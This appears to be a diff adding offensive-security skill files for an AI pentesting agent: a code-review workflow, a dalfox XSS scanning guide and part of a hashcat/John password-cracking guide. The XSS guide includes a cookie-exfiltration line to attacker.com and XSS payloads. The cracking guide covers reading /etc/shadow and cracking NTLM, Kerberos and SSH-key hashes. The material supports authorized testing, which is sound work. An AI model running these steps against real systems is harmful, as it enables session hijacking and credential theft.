- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,71 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: code-review-headless
|
|
5
|
+
description: Headless code review workflow for AIRecon Docker engine (CLI-only), focused on bug discovery, security risks, regressions, and test gaps.
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Code Review (Headless / Docker-Friendly)
|
|
9
|
+
|
|
10
|
+
Use this workflow when reviewing source code, pull requests, or diffs for bugs and security issues.
|
|
11
|
+
|
|
12
|
+
## Constraints
|
|
13
|
+
|
|
14
|
+
- AIRecon engine runs in Docker + terminal tools.
|
|
15
|
+
- Do not depend on GUI workflows (IDE visual diff, GUI SAST dashboards, browser-only inspectors).
|
|
16
|
+
- Prefer reproducible CLI evidence: command output, file paths, line references.
|
|
17
|
+
|
|
18
|
+
## Review Priorities
|
|
19
|
+
|
|
20
|
+
1. Correctness bugs (logic, state, edge cases).
|
|
21
|
+
2. Security flaws (injection, authz/authn, unsafe deserialization, path handling).
|
|
22
|
+
3. Behavioral regressions introduced by new changes.
|
|
23
|
+
4. Missing tests for high-risk paths.
|
|
24
|
+
5. Performance/memory issues only when impactful.
|
|
25
|
+
|
|
26
|
+
## Fast Triage Flow
|
|
27
|
+
|
|
28
|
+
1. Scope the change:
|
|
29
|
+
- `git status --short`
|
|
30
|
+
- `git diff --stat`
|
|
31
|
+
- `git diff -- <file>`
|
|
32
|
+
2. Locate critical surfaces:
|
|
33
|
+
- Input parsing, path normalization, report writing, auth/session, tool dispatch.
|
|
34
|
+
3. Validate invariants:
|
|
35
|
+
- No empty target/path writes
|
|
36
|
+
- No unsafe path traversal
|
|
37
|
+
- No silently swallowed critical errors
|
|
38
|
+
- Deterministic behavior in retries/recovery
|
|
39
|
+
4. Confirm with tests:
|
|
40
|
+
- Run the smallest relevant test subset first
|
|
41
|
+
- Then broader suite if core behavior changed
|
|
42
|
+
|
|
43
|
+
## What to Report
|
|
44
|
+
|
|
45
|
+
- Findings first, ordered by severity.
|
|
46
|
+
- Include exact file + line references.
|
|
47
|
+
- Include impact + failure mode + minimal fix.
|
|
48
|
+
- Explicitly call out missing test coverage.
|
|
49
|
+
- If no bug found, state residual risk and untested assumptions.
|
|
50
|
+
|
|
51
|
+
## Useful CLI Patterns
|
|
52
|
+
|
|
53
|
+
```bash
|
|
54
|
+
# Find suspicious patterns quickly
|
|
55
|
+
grep -Rsn "TODO\\|FIXME\\|except Exception\\|pass$\\|eval\\|exec\\|subprocess" airecon/
|
|
56
|
+
|
|
57
|
+
# Focus on path/file handling
|
|
58
|
+
grep -Rsn "resolve\\|relative_to\\|os.path.join\\|open(" airecon/proxy/
|
|
59
|
+
|
|
60
|
+
# Verify reporting behavior
|
|
61
|
+
pytest -q tests/proxy/test_reporting.py
|
|
62
|
+
|
|
63
|
+
# Verify agent loop behavior
|
|
64
|
+
pytest -q tests/proxy/agent/test_loop.py tests/proxy/agent/test_loop_extended.py
|
|
65
|
+
```
|
|
66
|
+
|
|
67
|
+
## Output Discipline
|
|
68
|
+
|
|
69
|
+
- Every claim must be tied to concrete evidence from code or test output.
|
|
70
|
+
- Avoid speculative findings without proof.
|
|
71
|
+
- Prefer small, safe patches with matching tests.
|
|
@@ -0,0 +1,189 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# dalfox — XSS Scanner Usage Guide for AIRecon
|
|
4
|
+
|
|
5
|
+
dalfox is a parameter analysis and XSS scanner. It is effective ONLY when pointed at URLs that
|
|
6
|
+
already have reflected parameters confirmed through prior enumeration. Running dalfox against a
|
|
7
|
+
root URL or a URL with no query parameters is the definition of wasted effort.
|
|
8
|
+
|
|
9
|
+
---
|
|
10
|
+
|
|
11
|
+
## MANDATORY PRE-CONDITIONS (All must be true before using dalfox)
|
|
12
|
+
|
|
13
|
+
[ ] You have collected URLs with parameters from: katana, waybackurls, gau, historical URL analysis.
|
|
14
|
+
Output should be in output/urls_all_deduped.txt or output/historical_urls.txt.
|
|
15
|
+
[ ] For single-URL mode: you have manually confirmed the parameter reflects user input in the response.
|
|
16
|
+
Test manually first: curl "http://target/search?q=CANARY123" — does CANARY123 appear in response?
|
|
17
|
+
[ ] Caido is running (caido-setup has been executed) so all dalfox traffic is captured.
|
|
18
|
+
[ ] You have a specific hypothesis: which parameter on which endpoint is suspected to be injectable.
|
|
19
|
+
|
|
20
|
+
Running dalfox without confirmed reflected parameters = noise, not intelligence.
|
|
21
|
+
|
|
22
|
+
---
|
|
23
|
+
|
|
24
|
+
## What dalfox Does and Does Not Do
|
|
25
|
+
|
|
26
|
+
WHAT IT DOES:
|
|
27
|
+
- Injects XSS payloads into URL parameters and POST body fields
|
|
28
|
+
- Detects reflection and attempts to confirm browser-side execution
|
|
29
|
+
- Identifies DOM-based XSS sources and sinks via headless browser
|
|
30
|
+
- Tests blind XSS with a callback URL (interactsh integration)
|
|
31
|
+
- Supports WAF bypass payload mutation
|
|
32
|
+
|
|
33
|
+
WHAT IT DOES NOT DO:
|
|
34
|
+
- Understand application context (what the parameter is used for)
|
|
35
|
+
- Detect stored XSS without a second request to a rendered page
|
|
36
|
+
- Guarantee zero false positives — all "VULN" results require manual browser verification
|
|
37
|
+
- Replace manual analysis of JavaScript source code for DOM XSS sinks
|
|
38
|
+
|
|
39
|
+
---
|
|
40
|
+
|
|
41
|
+
## Command Patterns
|
|
42
|
+
|
|
43
|
+
PIPE MODE (process URL list from file — most common for recon):
|
|
44
|
+
cat output/xss_candidates.txt | dalfox pipe \
|
|
45
|
+
--proxy http://127.0.0.1:48080 \
|
|
46
|
+
-o output/dalfox_pipe_results.txt
|
|
47
|
+
|
|
48
|
+
Generate candidate list from historical URLs with gf first:
|
|
49
|
+
cat output/urls_all_deduped.txt | gf xss | sort -u > output/xss_candidates.txt
|
|
50
|
+
cat output/historical_urls.txt | gf xss | sort -u >> output/xss_candidates.txt
|
|
51
|
+
cat output/xss_candidates.txt | dalfox pipe --proxy http://127.0.0.1:48080 -o output/dalfox_results.txt
|
|
52
|
+
|
|
53
|
+
SINGLE URL MODE (after manual confirmation of reflection):
|
|
54
|
+
dalfox url "http://target.com/search?q=test" \
|
|
55
|
+
--proxy http://127.0.0.1:48080 \
|
|
56
|
+
-o output/dalfox_search_q.txt
|
|
57
|
+
|
|
58
|
+
WITH AUTHENTICATION (session cookie required):
|
|
59
|
+
dalfox url "http://target.com/profile?name=test" \
|
|
60
|
+
--cookie "session=<value>" \
|
|
61
|
+
--proxy http://127.0.0.1:48080 \
|
|
62
|
+
-o output/dalfox_profile.txt
|
|
63
|
+
|
|
64
|
+
POST BODY PARAMETER:
|
|
65
|
+
dalfox url "http://target.com/submit" \
|
|
66
|
+
-X POST \
|
|
67
|
+
--data "username=test&message=hello" \
|
|
68
|
+
--proxy http://127.0.0.1:48080 \
|
|
69
|
+
-o output/dalfox_post.txt
|
|
70
|
+
|
|
71
|
+
DOM XSS DISCOVERY (skip BAV — focus on DOM sinks only):
|
|
72
|
+
dalfox url "http://target.com/page?ref=test" \
|
|
73
|
+
--skip-bav \
|
|
74
|
+
--only-discovery \
|
|
75
|
+
--proxy http://127.0.0.1:48080
|
|
76
|
+
|
|
77
|
+
BLIND XSS (callback-based, survives stored/out-of-band contexts):
|
|
78
|
+
Requires interactsh-client for callback URL:
|
|
79
|
+
CALLBACK=$(interactsh-client -n 1 2>/dev/null | grep -o '[a-z0-9]*\.oast\.fun' | head -1)
|
|
80
|
+
dalfox url "http://target.com/feedback?msg=test" \
|
|
81
|
+
--blind "$CALLBACK" \
|
|
82
|
+
--proxy http://127.0.0.1:48080 \
|
|
83
|
+
-o output/dalfox_blind.txt
|
|
84
|
+
Then monitor: interactsh-client -n 1 -o output/interactsh_hits.txt
|
|
85
|
+
|
|
86
|
+
WAF BYPASS MODE:
|
|
87
|
+
dalfox url "http://target.com/search?q=test" \
|
|
88
|
+
--waf-evasion \
|
|
89
|
+
--proxy http://127.0.0.1:48080 \
|
|
90
|
+
-o output/dalfox_waf.txt
|
|
91
|
+
|
|
92
|
+
---
|
|
93
|
+
|
|
94
|
+
## Integration with Caido
|
|
95
|
+
|
|
96
|
+
Route ALL dalfox traffic through Caido to capture request/response pairs:
|
|
97
|
+
--proxy http://127.0.0.1:48080
|
|
98
|
+
|
|
99
|
+
After dalfox finishes, query Caido history to inspect which payloads triggered responses:
|
|
100
|
+
curl -sL -X POST http://127.0.0.1:48080/graphql \
|
|
101
|
+
-H "Content-Type: application/json" \
|
|
102
|
+
-H "Authorization: Bearer $TOKEN" \
|
|
103
|
+
-d '{"query":"{ requests(filter: {host: {eq: \"target.com\"}, method: {eq: \"GET\"}}) { edges { node { id method path response { statusCode length } } } } }"}'
|
|
104
|
+
|
|
105
|
+
Use Caido Replay to manually re-send a promising request with a specific payload:
|
|
106
|
+
1. Find the request ID from history query above
|
|
107
|
+
2. createReplaySession → startReplayTask with modified payload
|
|
108
|
+
3. Inspect response to confirm reflection context
|
|
109
|
+
|
|
110
|
+
---
|
|
111
|
+
|
|
112
|
+
## Result Interpretation
|
|
113
|
+
|
|
114
|
+
dalfox output levels:
|
|
115
|
+
|
|
116
|
+
[I] INFO — Informational: reflected content found, not yet confirmed as XSS
|
|
117
|
+
[W] WEAK — Potential XSS: payload reflected but execution not confirmed
|
|
118
|
+
[V] VULN — Confirmed XSS: payload executed in headless browser context
|
|
119
|
+
|
|
120
|
+
FOR EVERY [V] VULN RESULT:
|
|
121
|
+
STEP 1: Note the exact URL and payload dalfox used.
|
|
122
|
+
STEP 2: Manually reproduce with browser_action:
|
|
123
|
+
browser_action(action="goto", url="<the exact VULN url>")
|
|
124
|
+
browser_action(action="get_console_logs", tab_id="main")
|
|
125
|
+
STEP 3: Confirm execution context — what DOM element? What encoding was bypassed?
|
|
126
|
+
STEP 4: Upgrade PoC to impact-demonstrating payload:
|
|
127
|
+
fetch('https://attacker.com?c='+document.cookie) — session hijack
|
|
128
|
+
fetch('/api/admin', {method:'POST'}) — privilege chain
|
|
129
|
+
STEP 5: Document: URL, parameter, payload, context, impact. Call create_vulnerability_report.
|
|
130
|
+
|
|
131
|
+
FOR [W] WEAK RESULTS:
|
|
132
|
+
Do not report. Investigate manually: does the payload appear in the response body?
|
|
133
|
+
What context? HTML node, attribute, JS string, URL? Craft a context-specific payload manually.
|
|
134
|
+
|
|
135
|
+
FOR FALSE POSITIVES:
|
|
136
|
+
dalfox may flag benign reflections where input is HTML-encoded. Always verify:
|
|
137
|
+
curl "http://target/path?param=<svg onload=alert(1)>" | grep -i "svg\|onload\|alert"
|
|
138
|
+
If output is <svg ... — it is safely encoded. Not a vulnerability.
|
|
139
|
+
|
|
140
|
+
---
|
|
141
|
+
|
|
142
|
+
## DOM XSS Manual Analysis Workflow
|
|
143
|
+
|
|
144
|
+
When dalfox --only-discovery flags a DOM XSS source:
|
|
145
|
+
|
|
146
|
+
STEP 1: Visit the page in the browser:
|
|
147
|
+
browser_action(action="goto", url="http://target.com/page")
|
|
148
|
+
|
|
149
|
+
STEP 2: Get page JavaScript source to find sinks:
|
|
150
|
+
browser_action(action="view_source", tab_id="main")
|
|
151
|
+
Look for: innerHTML, outerHTML, document.write, eval, setTimeout with string args,
|
|
152
|
+
location.hash, URLSearchParams, document.referrer flowing to a sink.
|
|
153
|
+
|
|
154
|
+
STEP 3: Instrument the page to trace data flow:
|
|
155
|
+
browser_action(action="execute_js", js_code="""
|
|
156
|
+
(function(){
|
|
157
|
+
const orig = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;
|
|
158
|
+
Object.defineProperty(Element.prototype, 'innerHTML', {
|
|
159
|
+
set: function(v) { if(v && v.includes('<')) console.log('[SINK innerHTML]', v.substring(0,100)); return orig.call(this, v); }
|
|
160
|
+
});
|
|
161
|
+
})()
|
|
162
|
+
""", tab_id="main")
|
|
163
|
+
|
|
164
|
+
STEP 4: Inject the suspected source (e.g., hash):
|
|
165
|
+
browser_action(action="goto", url="http://target.com/page#<img src=x onerror=alert(1)>")
|
|
166
|
+
browser_action(action="get_console_logs", tab_id="main")
|
|
167
|
+
Look for [SINK innerHTML] in console — confirms the DOM XSS path.
|
|
168
|
+
|
|
169
|
+
---
|
|
170
|
+
|
|
171
|
+
## Workflow Integration (Where dalfox Fits)
|
|
172
|
+
|
|
173
|
+
Phase 2 (Attack Surface Expansion — URL enumeration complete):
|
|
174
|
+
Run gf xss on collected URLs → dalfox pipe → capture in Caido → manually verify [V] results.
|
|
175
|
+
|
|
176
|
+
Phase 3 (Manual Testing — specific parameter identified):
|
|
177
|
+
dalfox single URL mode on confirmed-reflective parameter.
|
|
178
|
+
Always preceded by manual curl reflection check.
|
|
179
|
+
|
|
180
|
+
Phase 4 (Vulnerability Confirmation):
|
|
181
|
+
browser_action verification of [V] results.
|
|
182
|
+
Impact-demonstrating PoC crafting.
|
|
183
|
+
create_vulnerability_report only after manual browser confirmation.
|
|
184
|
+
|
|
185
|
+
NEVER:
|
|
186
|
+
Run dalfox against a URL with no query parameters.
|
|
187
|
+
Run dalfox against all live hosts blindly.
|
|
188
|
+
Report a [W] WEAK result without manual verification.
|
|
189
|
+
Skip browser_action verification — dalfox headless detection can false-positive.
|
|
@@ -0,0 +1,258 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
---
|
|
4
|
+
name: hashcat-john
|
|
5
|
+
description: Password cracking with hashcat and John the Ripper — hash identification, attack modes, rules, wordlists, specific hash types for Windows NTLM, Linux shadow, web hashes, and Kerberos tickets
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
# Hashcat & John the Ripper
|
|
9
|
+
|
|
10
|
+
Password cracking = identify hash type → choose attack mode → use wordlist + rules → crack. hashcat = GPU-accelerated (faster). john = CPU-based (easier syntax, more built-in tools).
|
|
11
|
+
|
|
12
|
+
**Install:**
|
|
13
|
+
```
|
|
14
|
+
sudo apt-get install -y hashcat john hash-identifier
|
|
15
|
+
sudo apt-get install -y hashid
|
|
16
|
+
# wordlists:
|
|
17
|
+
sudo apt-get install -y wordlists
|
|
18
|
+
ls /usr/share/wordlists/ # rockyou.txt.gz → gunzip it
|
|
19
|
+
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
|
|
20
|
+
```
|
|
21
|
+
|
|
22
|
+
---
|
|
23
|
+
|
|
24
|
+
## Hash Identification
|
|
25
|
+
|
|
26
|
+
# hash-identifier:
|
|
27
|
+
hash-identifier '<hash_string>'
|
|
28
|
+
|
|
29
|
+
# hashid:
|
|
30
|
+
hashid '<hash>'
|
|
31
|
+
hashid -m '<hash>' # -m = show hashcat mode number
|
|
32
|
+
|
|
33
|
+
# Identify by length and format:
|
|
34
|
+
# 32 chars hex → MD5 ($1) or NTLM
|
|
35
|
+
# 40 chars hex → SHA1
|
|
36
|
+
# 60 chars $2y$ → bcrypt
|
|
37
|
+
# 64 chars hex → SHA256
|
|
38
|
+
# 128 chars hex → SHA512
|
|
39
|
+
# $1$ → MD5crypt (Linux)
|
|
40
|
+
# $5$ → SHA256crypt
|
|
41
|
+
# $6$ → SHA512crypt
|
|
42
|
+
# $apr1$ → Apache MD5
|
|
43
|
+
# $y$ → yescrypt
|
|
44
|
+
|
|
45
|
+
# hashcat example hashes (reference):
|
|
46
|
+
# https://hashcat.net/wiki/doku.php?id=example_hashes
|
|
47
|
+
|
|
48
|
+
---
|
|
49
|
+
|
|
50
|
+
## Common Hash Modes (hashcat -m)
|
|
51
|
+
|
|
52
|
+
| Mode | Hash Type |
|
|
53
|
+
|-------|------------------------------|
|
|
54
|
+
| 0 | MD5 |
|
|
55
|
+
| 100 | SHA1 |
|
|
56
|
+
| 1000 | NTLM (Windows) |
|
|
57
|
+
| 1400 | SHA256 |
|
|
58
|
+
| 1700 | SHA512 |
|
|
59
|
+
| 1800 | SHA512crypt $6$ (Linux) |
|
|
60
|
+
| 500 | MD5crypt $1$ (Linux) |
|
|
61
|
+
| 3200 | bcrypt $2*$ |
|
|
62
|
+
| 13100 | Kerberoast TGS |
|
|
63
|
+
| 18200 | Kerberos AS-REP |
|
|
64
|
+
| 5600 | NetNTLMv2 |
|
|
65
|
+
| 5500 | NetNTLMv1 |
|
|
66
|
+
| 2500 | WPA/WPA2 PMKID |
|
|
67
|
+
| 13600 | WinZip (ZIP AES-256) |
|
|
68
|
+
| 22921 | RSA/DSA/EC SSH private key |
|
|
69
|
+
| 7100 | macOS PBKDF2-SHA512 |
|
|
70
|
+
|
|
71
|
+
---
|
|
72
|
+
|
|
73
|
+
## hashcat Attack Modes
|
|
74
|
+
|
|
75
|
+
### Wordlist Attack (-a 0)
|
|
76
|
+
|
|
77
|
+
# Basic wordlist:
|
|
78
|
+
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
|
|
79
|
+
|
|
80
|
+
# With rules (BEST — adds 10x coverage):
|
|
81
|
+
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
82
|
+
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
|
|
83
|
+
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule
|
|
84
|
+
|
|
85
|
+
# Multiple wordlists:
|
|
86
|
+
hashcat -m 1000 hash.txt wordlist1.txt wordlist2.txt
|
|
87
|
+
|
|
88
|
+
### Brute Force (-a 3)
|
|
89
|
+
|
|
90
|
+
# Charset masks: ?l=lowercase, ?u=uppercase, ?d=digit, ?s=special, ?a=all
|
|
91
|
+
hashcat -m 1000 hash.txt -a 3 ?u?l?l?l?l?d?d # Aaaaaa00 pattern
|
|
92
|
+
hashcat -m 1000 hash.txt -a 3 -i ?a?a?a?a?a?a # Incremental 1-6 chars all charset
|
|
93
|
+
hashcat -m 1000 hash.txt -a 3 Password?d?d?d # Password + 3 digits
|
|
94
|
+
|
|
95
|
+
### Combination Attack (-a 1)
|
|
96
|
+
|
|
97
|
+
# Combine two wordlists:
|
|
98
|
+
hashcat -m 1000 hash.txt wordlist1.txt wordlist2.txt -a 1
|
|
99
|
+
|
|
100
|
+
### Hybrid Attack (-a 6/7)
|
|
101
|
+
|
|
102
|
+
# Wordlist + mask:
|
|
103
|
+
hashcat -m 1000 hash.txt -a 6 /usr/share/wordlists/rockyou.txt ?d?d?d?d # word + 4 digits
|
|
104
|
+
# Mask + wordlist:
|
|
105
|
+
hashcat -m 1000 hash.txt -a 7 ?d?d /usr/share/wordlists/rockyou.txt # 2 digits + word
|
|
106
|
+
|
|
107
|
+
---
|
|
108
|
+
|
|
109
|
+
## Common Cracking Scenarios
|
|
110
|
+
|
|
111
|
+
### Windows NTLM (from secretsdump, Responder)
|
|
112
|
+
|
|
113
|
+
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
114
|
+
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
115
|
+
# Hash format: username:RID:LM:NTLM:::
|
|
116
|
+
# Extract NTLM only: cut -d: -f4 secretsdump_output.txt > ntlm_only.txt
|
|
117
|
+
|
|
118
|
+
### Linux Shadow (/etc/shadow)
|
|
119
|
+
|
|
120
|
+
# Extract hash:
|
|
121
|
+
sudo cat /etc/shadow | grep -v "!\|\*" > shadow_hashes.txt
|
|
122
|
+
# Format: $6$salt$hash (SHA512crypt)
|
|
123
|
+
hashcat -m 1800 shadow_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
124
|
+
|
|
125
|
+
# Unshadow (combine /etc/passwd + /etc/shadow for john):
|
|
126
|
+
unshadow /etc/passwd /etc/shadow > combined.txt
|
|
127
|
+
john combined.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
128
|
+
|
|
129
|
+
### Kerberoast TGS Tickets
|
|
130
|
+
|
|
131
|
+
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
|
|
132
|
+
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
133
|
+
|
|
134
|
+
### AS-REP Roasting
|
|
135
|
+
|
|
136
|
+
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
|
|
137
|
+
|
|
138
|
+
### NetNTLMv2 (from Responder)
|
|
139
|
+
|
|
140
|
+
hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt
|
|
141
|
+
hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
142
|
+
|
|
143
|
+
### Web Application Hashes
|
|
144
|
+
|
|
145
|
+
# MD5: $0$, no prefix
|
|
146
|
+
hashcat -m 0 web_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
147
|
+
|
|
148
|
+
# SHA256 (Django, etc.):
|
|
149
|
+
hashcat -m 1400 sha256_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
150
|
+
|
|
151
|
+
# bcrypt (most web apps):
|
|
152
|
+
hashcat -m 3200 bcrypt_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
153
|
+
# NOTE: bcrypt is slow — GPU helps but still slow; focus on weak passwords
|
|
154
|
+
|
|
155
|
+
# WordPress (phpass $P$):
|
|
156
|
+
hashcat -m 400 wp_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
157
|
+
|
|
158
|
+
### SSH Private Key
|
|
159
|
+
|
|
160
|
+
# Convert key to hash first:
|
|
161
|
+
ssh2john id_rsa > id_rsa.hash
|
|
162
|
+
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
|
|
163
|
+
# OR:
|
|
164
|
+
hashcat -m 22921 id_rsa.hash /usr/share/wordlists/rockyou.txt
|
|
165
|
+
|
|
166
|
+
### ZIP / Archive Password
|
|
167
|
+
|
|
168
|
+
zip2john archive.zip > zip.hash
